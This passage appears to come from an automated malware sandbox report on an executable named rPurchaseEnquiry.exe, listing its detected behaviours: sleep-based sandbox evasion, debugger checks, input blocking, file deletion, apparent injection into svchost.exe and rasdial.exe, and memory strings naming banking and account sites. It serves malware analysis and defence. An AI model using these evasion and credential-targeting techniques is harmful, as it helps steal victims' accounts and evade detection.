                Source: C:\Windows\SysWOW64\rasdial.exe TID: 7456Thread sleep time: -366000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exe TID: 7456Thread sleep count: 9789 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exe TID: 7456Thread sleep time: -19578000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\tnKZWszOsVBkEyeboeqnwaxjknmctJtbHQczJyJzsIVHeEZweqRaJpgbiEhlDGVApknlI\rdDg0b2bK2qO9Yy1bQgDRyk.exe TID: 7536Thread sleep time: -85000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\tnKZWszOsVBkEyeboeqnwaxjknmctJtbHQczJyJzsIVHeEZweqRaJpgbiEhlDGVApknlI\rdDg0b2bK2qO9Yy1bQgDRyk.exe TID: 7536Thread sleep count: 39 > 30Jump to behavior
                Source: C:\Program Files (x86)\tnKZWszOsVBkEyeboeqnwaxjknmctJtbHQczJyJzsIVHeEZweqRaJpgbiEhlDGVApknlI\rdDg0b2bK2qO9Yy1bQgDRyk.exe TID: 7536Thread sleep time: -58500s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\tnKZWszOsVBkEyeboeqnwaxjknmctJtbHQczJyJzsIVHeEZweqRaJpgbiEhlDGVApknlI\rdDg0b2bK2qO9Yy1bQgDRyk.exe TID: 7536Thread sleep count: 40 > 30Jump to behavior
                Source: C:\Program Files (x86)\tnKZWszOsVBkEyeboeqnwaxjknmctJtbHQczJyJzsIVHeEZweqRaJpgbiEhlDGVApknlI\rdDg0b2bK2qO9Yy1bQgDRyk.exe TID: 7536Thread sleep time: -40000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\rasdial.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\rPurchaseEnquiry.exeCode function: 0_2_00BF445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_00BF445A
                Source: C:\Users\user\Desktop\rPurchaseEnquiry.exeCode function: 0_2_00BFC6D1 FindFirstFileW,FindClose,0_2_00BFC6D1
                Source: C:\Users\user\Desktop\rPurchaseEnquiry.exeCode function: 0_2_00BFC75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00BFC75C
                Source: C:\Users\user\Desktop\rPurchaseEnquiry.exeCode function: 0_2_00BFEF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00BFEF95
                Source: C:\Users\user\Desktop\rPurchaseEnquiry.exeCode function: 0_2_00BFF0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00BFF0F2
                Source: C:\Users\user\Desktop\rPurchaseEnquiry.exeCode function: 0_2_00BFF3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00BFF3F3
                Source: C:\Users\user\Desktop\rPurchaseEnquiry.exeCode function: 0_2_00BF37EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00BF37EF
                Source: C:\Users\user\Desktop\rPurchaseEnquiry.exeCode function: 0_2_00BF3B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00BF3B12
                Source: C:\Users\user\Desktop\rPurchaseEnquiry.exeCode function: 0_2_00BFBCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00BFBCBC
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_02FBC6F0 FindFirstFileW,FindNextFileW,FindClose,5_2_02FBC6F0
                Source: C:\Users\user\Desktop\rPurchaseEnquiry.exeCode function: 0_2_00B949A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00B949A0
                Source: e2ZZ3BBL.5.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                Source: e2ZZ3BBL.5.drBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                Source: e2ZZ3BBL.5.drBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
                Source: e2ZZ3BBL.5.drBinary or memory string: discord.comVMware20,11696487552f
                Source: e2ZZ3BBL.5.drBinary or memory string: bankofamerica.comVMware20,11696487552x
                Source: e2ZZ3BBL.5.drBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
                Source: e2ZZ3BBL.5.drBinary or memory string: ms.portal.azure.comVMware20,11696487552
                Source: e2ZZ3BBL.5.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                Source: e2ZZ3BBL.5.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                Source: e2ZZ3BBL.5.drBinary or memory string: global block list test formVMware20,11696487552
                Source: e2ZZ3BBL.5.drBinary or memory string: tasks.office.comVMware20,11696487552o
                Source: e2ZZ3BBL.5.drBinary or memory string: AMC password management pageVMware20,11696487552
                Source: rasdial.exe, 00000005.00000002.3646734607.0000000003329000.00000004.00000020.00020000.00000000.sdmp, rdDg0b2bK2qO9Yy1bQgDRyk.exe, 0000000C.00000002.3647216665.00000000005EA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: e2ZZ3BBL.5.drBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
                Source: firefox.exe, 0000000D.00000002.1596351162.0000021B002EE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllcc
                Source: e2ZZ3BBL.5.drBinary or memory string: interactivebrokers.comVMware20,11696487552
                Source: e2ZZ3BBL.5.drBinary or memory string: dev.azure.comVMware20,11696487552j
                Source: e2ZZ3BBL.5.drBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
                Source: e2ZZ3BBL.5.drBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                Source: e2ZZ3BBL.5.drBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
                Source: e2ZZ3BBL.5.drBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                Source: e2ZZ3BBL.5.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                Source: e2ZZ3BBL.5.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                Source: e2ZZ3BBL.5.drBinary or memory string: outlook.office365.comVMware20,11696487552t
                Source: e2ZZ3BBL.5.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                Source: e2ZZ3BBL.5.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                Source: e2ZZ3BBL.5.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                Source: e2ZZ3BBL.5.drBinary or memory string: outlook.office.comVMware20,11696487552s
                Source: e2ZZ3BBL.5.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                Source: e2ZZ3BBL.5.drBinary or memory string: turbotax.intuit.comVMware20,11696487552t
                Source: e2ZZ3BBL.5.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
                Source: e2ZZ3BBL.5.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
                Source: e2ZZ3BBL.5.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                Source: C:\Users\user\Desktop\rPurchaseEnquiry.exeAPI call chain: ExitProcess graph end nodegraph_0-104320
                Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0387096E rdtsc 3_2_0387096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00417863 LdrLoadDll,3_2_00417863
                Source: C:\Users\user\Desktop\rPurchaseEnquiry.exeCode function: 0_2_00C03F09 BlockInput,0_2_00C03F09
                Source: C:\Users\user\Desktop\rPurchaseEnquiry.exeCode function: 0_2_00B93B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00B93B3A
                Source: C:\Users\user\Desktop\rPurchaseEnquiry.exeCode function: 0_2_00BC5A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00BC5A7C
                Source: C:\Users\user\Desktop\rPurchaseEnquiry.exeCode function: 0_2_00B94B37 LoadLibraryA,GetProcAddress,0_2_00B94B37
                Source: C:\Users\user\Desktop\rPurchaseEnquiry.exeCode function: 0_2_017D34F0 mov eax, dword ptr fs:[00000030h]0_2_017D34F0
                Source: C:\Users\user\Desktop\rPurchaseEnquiry.exeCode function: 0_2_017D3490 mov eax, dword ptr fs:[00000030h]0_2_017D3490
                Source: C:\Users\user\Desktop\rPurchaseEnquiry.exeCode function: 0_2_017D1E70 mov eax, dword ptr fs:[00000030h]0_2_017D1E70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0382E388 mov eax, dword ptr fs:[00000030h]3_2_0382E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0382E388 mov eax, dword ptr fs:[00000030h]3_2_0382E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0382E388 mov eax, dword ptr fs:[00000030h]3_2_0382E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0385438F mov eax, dword ptr fs:[00000030h]3_2_0385438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0385438F mov eax, dword ptr fs:[00000030h]3_2_0385438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03828397 mov eax, dword ptr fs:[00000030h]3_2_03828397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03828397 mov eax, dword ptr fs:[00000030h]3_2_03828397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03828397 mov eax, dword ptr fs:[00000030h]3_2_03828397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038EC3CD mov eax, dword ptr fs:[00000030h]3_2_038EC3CD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0383A3C0 mov eax, dword ptr fs:[00000030h]3_2_0383A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0383A3C0 mov eax, dword ptr fs:[00000030h]3_2_0383A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0383A3C0 mov eax, dword ptr fs:[00000030h]3_2_0383A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0383A3C0 mov eax, dword ptr fs:[00000030h]3_2_0383A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0383A3C0 mov eax, dword ptr fs:[00000030h]3_2_0383A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0383A3C0 mov eax, dword ptr fs:[00000030h]3_2_0383A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038383C0 mov eax, dword ptr fs:[00000030h]3_2_038383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038383C0 mov eax, dword ptr fs:[00000030h]3_2_038383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038383C0 mov eax, dword ptr fs:[00000030h]3_2_038383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038383C0 mov eax, dword ptr fs:[00000030h]3_2_038383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B63C0 mov eax, dword ptr fs:[00000030h]3_2_038B63C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038DE3DB mov eax, dword ptr fs:[00000030h]3_2_038DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038DE3DB mov eax, dword ptr fs:[00000030h]3_2_038DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038DE3DB mov ecx, dword ptr fs:[00000030h]3_2_038DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038DE3DB mov eax, dword ptr fs:[00000030h]3_2_038DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038D43D4 mov eax, dword ptr fs:[00000030h]3_2_038D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038D43D4 mov eax, dword ptr fs:[00000030h]3_2_038D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038403E9 mov eax, dword ptr fs:[00000030h]3_2_038403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038403E9 mov eax, dword ptr fs:[00000030h]3_2_038403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038403E9 mov eax, dword ptr fs:[00000030h]3_2_038403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038403E9 mov eax, dword ptr fs:[00000030h]3_2_038403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038403E9 mov eax, dword ptr fs:[00000030h]3_2_038403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038403E9 mov eax, dword ptr fs:[00000030h]3_2_038403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038403E9 mov eax, dword ptr fs:[00000030h]3_2_038403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038403E9 mov eax, dword ptr fs:[00000030h]3_2_038403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0384E3F0 mov eax, dword ptr fs:[00000030h]3_2_0384E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0384E3F0 mov eax, dword ptr fs:[00000030h]3_2_0384E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0384E3F0 mov eax, dword ptr fs:[00000030h]3_2_0384E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038663FF mov eax, dword ptr fs:[00000030h]3_2_038663FF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386A30B mov eax, dword ptr fs:[00000030h]3_2_0386A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386A30B mov eax, dword ptr fs:[00000030h]3_2_0386A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386A30B mov eax, dword ptr fs:[00000030h]3_2_0386A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0382C310 mov ecx, dword ptr fs:[00000030h]3_2_0382C310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03850310 mov ecx, dword ptr fs:[00000030h]3_2_03850310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B2349 mov eax, dword ptr fs:[00000030h]3_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B2349 mov eax, dword ptr fs:[00000030h]3_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B2349 mov eax, dword ptr fs:[00000030h]3_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B2349 mov eax, dword ptr fs:[00000030h]3_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B2349 mov eax, dword ptr fs:[00000030h]3_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B2349 mov eax, dword ptr fs:[00000030h]3_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B2349 mov eax, dword ptr fs:[00000030h]3_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B2349 mov eax, dword ptr fs:[00000030h]3_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B2349 mov eax, dword ptr fs:[00000030h]3_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B2349 mov eax, dword ptr fs:[00000030h]3_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B2349 mov eax, dword ptr fs:[00000030h]3_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B2349 mov eax, dword ptr fs:[00000030h]3_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B2349 mov eax, dword ptr fs:[00000030h]3_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B2349 mov eax, dword ptr fs:[00000030h]3_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B2349 mov eax, dword ptr fs:[00000030h]3_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B035C mov eax, dword ptr fs:[00000030h]3_2_038B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B035C mov eax, dword ptr fs:[00000030h]3_2_038B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B035C mov eax, dword ptr fs:[00000030h]3_2_038B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B035C mov ecx, dword ptr fs:[00000030h]3_2_038B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B035C mov eax, dword ptr fs:[00000030h]3_2_038B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B035C mov eax, dword ptr fs:[00000030h]3_2_038B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038FA352 mov eax, dword ptr fs:[00000030h]3_2_038FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0390634F mov eax, dword ptr fs:[00000030h]3_2_0390634F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038D437C mov eax, dword ptr fs:[00000030h]3_2_038D437C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386E284 mov eax, dword ptr fs:[00000030h]3_2_0386E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386E284 mov eax, dword ptr fs:[00000030h]3_2_0386E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B0283 mov eax, dword ptr fs:[00000030h]3_2_038B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B0283 mov eax, dword ptr fs:[00000030h]3_2_038B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B0283 mov eax, dword ptr fs:[00000030h]3_2_038B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038402A0 mov eax, dword ptr fs:[00000030h]3_2_038402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038402A0 mov eax, dword ptr fs:[00000030h]3_2_038402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038C62A0 mov eax, dword ptr fs:[00000030h]3_2_038C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038C62A0 mov ecx, dword ptr fs:[00000030h]3_2_038C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038C62A0 mov eax, dword ptr fs:[00000030h]3_2_038C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038C62A0 mov eax, dword ptr fs:[00000030h]3_2_038C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038C62A0 mov eax, dword ptr fs:[00000030h]3_2_038C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038C62A0 mov eax, dword ptr fs:[00000030h]3_2_038C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0383A2C3 mov eax, dword ptr fs:[00000030h]3_2_0383A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0383A2C3 mov eax, dword ptr fs:[00000030h]3_2_0383A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0383A2C3 mov eax, dword ptr fs:[00000030h]3_2_0383A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0383A2C3 mov eax, dword ptr fs:[00000030h]3_2_0383A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0383A2C3 mov eax, dword ptr fs:[00000030h]3_2_0383A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_039062D6 mov eax, dword ptr fs:[00000030h]3_2_039062D6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038402E1 mov eax, dword ptr fs:[00000030h]3_2_038402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038402E1 mov eax, dword ptr fs:[00000030h]3_2_038402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038402E1 mov eax, dword ptr fs:[00000030h]3_2_038402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0382823B mov eax, dword ptr fs:[00000030h]3_2_0382823B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B8243 mov eax, dword ptr fs:[00000030h]3_2_038B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B8243 mov ecx, dword ptr fs:[00000030h]3_2_038B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0390625D mov eax, dword ptr fs:[00000030h]3_2_0390625D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0382A250 mov eax, dword ptr fs:[00000030h]3_2_0382A250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03836259 mov eax, dword ptr fs:[00000030h]3_2_03836259
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038EA250 mov eax, dword ptr fs:[00000030h]3_2_038EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038EA250 mov eax, dword ptr fs:[00000030h]3_2_038EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03834260 mov eax, dword ptr fs:[00000030h]3_2_03834260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03834260 mov eax, dword ptr fs:[00000030h]3_2_03834260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03834260 mov eax, dword ptr fs:[00000030h]3_2_03834260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0382826B mov eax, dword ptr fs:[00000030h]3_2_0382826B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038E0274 mov eax, dword ptr fs:[00000030h]3_2_038E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038E0274 mov eax, dword ptr fs:[00000030h]3_2_038E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038E0274 mov eax, dword ptr fs:[00000030h]3_2_038E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038E0274 mov eax, dword ptr fs:[00000030h]3_2_038E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038E0274 mov eax, dword ptr fs:[00000030h]3_2_038E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038E0274 mov eax, dword ptr fs:[00000030h]3_2_038E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038E0274 mov eax, dword ptr fs:[00000030h]3_2_038E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038E0274 mov eax, dword ptr fs:[00000030h]3_2_038E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038E0274 mov eax, dword ptr fs:[00000030h]3_2_038E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038E0274 mov eax, dword ptr fs:[00000030h]3_2_038E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038E0274 mov eax, dword ptr fs:[00000030h]3_2_038E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038E0274 mov eax, dword ptr fs:[00000030h]3_2_038E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03870185 mov eax, dword ptr fs:[00000030h]3_2_03870185
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038EC188 mov eax, dword ptr fs:[00000030h]3_2_038EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038EC188 mov eax, dword ptr fs:[00000030h]3_2_038EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038D4180 mov eax, dword ptr fs:[00000030h]3_2_038D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038D4180 mov eax, dword ptr fs:[00000030h]3_2_038D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B019F mov eax, dword ptr fs:[00000030h]3_2_038B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B019F mov eax, dword ptr fs:[00000030h]3_2_038B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B019F mov eax, dword ptr fs:[00000030h]3_2_038B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B019F mov eax, dword ptr fs:[00000030h]3_2_038B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0382A197 mov eax, dword ptr fs:[00000030h]3_2_0382A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0382A197 mov eax, dword ptr fs:[00000030h]3_2_0382A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0382A197 mov eax, dword ptr fs:[00000030h]3_2_0382A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038F61C3 mov eax, dword ptr fs:[00000030h]3_2_038F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038F61C3 mov eax, dword ptr fs:[00000030h]3_2_038F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038AE1D0 mov eax, dword ptr fs:[00000030h]3_2_038AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038AE1D0 mov eax, dword ptr fs:[00000030h]3_2_038AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038AE1D0 mov ecx, dword ptr fs:[00000030h]3_2_038AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038AE1D0 mov eax, dword ptr fs:[00000030h]3_2_038AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038AE1D0 mov eax, dword ptr fs:[00000030h]3_2_038AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_039061E5 mov eax, dword ptr fs:[00000030h]3_2_039061E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038601F8 mov eax, dword ptr fs:[00000030h]3_2_038601F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038DE10E mov eax, dword ptr fs:[00000030h]3_2_038DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038DE10E mov ecx, dword ptr fs:[00000030h]3_2_038DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038DE10E mov eax, dword ptr fs:[00000030h]3_2_038DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038DE10E mov eax, dword ptr fs:[00000030h]3_2_038DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038DE10E mov ecx, dword ptr fs:[00000030h]3_2_038DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038DE10E mov eax, dword ptr fs:[00000030h]3_2_038DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038DE10E mov eax, dword ptr fs:[00000030h]3_2_038DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038DE10E mov ecx, dword ptr fs:[00000030h]3_2_038DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038DE10E mov eax, dword ptr fs:[00000030h]3_2_038DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038DE10E mov ecx, dword ptr fs:[00000030h]3_2_038DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038DA118 mov ecx, dword ptr fs:[00000030h]3_2_038DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038DA118 mov eax, dword ptr fs:[00000030h]3_2_038DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038DA118 mov eax, dword ptr fs:[00000030h]3_2_038DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038DA118 mov eax, dword ptr fs:[00000030h]3_2_038DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038F0115 mov eax, dword ptr fs:[00000030h]3_2_038F0115
